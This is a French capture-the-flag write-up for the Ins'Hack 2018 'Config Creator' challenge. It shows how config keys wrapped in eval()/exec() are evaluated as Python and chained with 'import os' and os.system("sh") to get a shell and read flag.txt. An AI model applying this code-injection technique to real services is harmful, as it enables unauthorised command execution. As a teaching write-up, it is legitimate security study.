Ins'Hack 2018 - Config Creator (MISC)
I’ve just written a small utility to create a config file (which are sooo painful to write by han, right?). Care to have a look? |
---|
nc config-creator.ctf.insecurity-insa.fr 10000 |
Find the fuck
En jouant un peu on remarque rapidement qu’il est possible d’évaluer une valeur en ajoutant une clé
switch :: ~ » nc config-creator.ctf.insecurity-insa.fr 10000 Welcome to the config creator! Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 1 Config key? test Config value? 1+1 Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 1 Config key? eval(test) Config value? nope Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 4 config: configuration [ test = 1+1; eval(test) = 2; ] Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice?
Building the payload
Il suffit maintenant de trouver un moyen d’exécuter un shell sur la cible. Naturlich, le module os
et sa fonction system
me vient à l’esprit, tout en espérant qu’il ne soit pas supprimé de la jail !
nc config-creator.ctf.insecurity-insa.fr 10000 Welcome to the config creator! Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 1 Config key? one Config value? import os Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 1 Config key? exec(one) Config value? fe Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 4 config: configuration [ one = import os; exec(one) = None; ] Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 1 Config key? next Config value? os.system("sh") Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 1 Config key? eval(next) Config value? fr Please choose your action: 1. Register a new config entry 2. Change value of an existing config entry 3. Show my template 4. Show my config 5. Reset current config 6. exit Choice? 4 id uid=1000(config-creator) gid=1000(config-creator) groups=1000(config-creator) ls app.py flag.txt cat flag.txt INSA{dont_get_me_wrong_i_love_python36}
En python deux fonctions existent et se ressemblent :
exec
eteval
Cependant elles ne font pas la même chose.
eval
évalue simplement d’une expression et retourne le résultat de celle-cieval("1+1") =>2
exec
execute du code python dynamiquement, il est ainsi possible d’utiliser des structures logiques, fonctions ou même importexec("a = 5") => None
- https://docs.python.org/3/library/functions.html#eval
- http://lucumr.pocoo.org/2011/2/1/exec-in-python/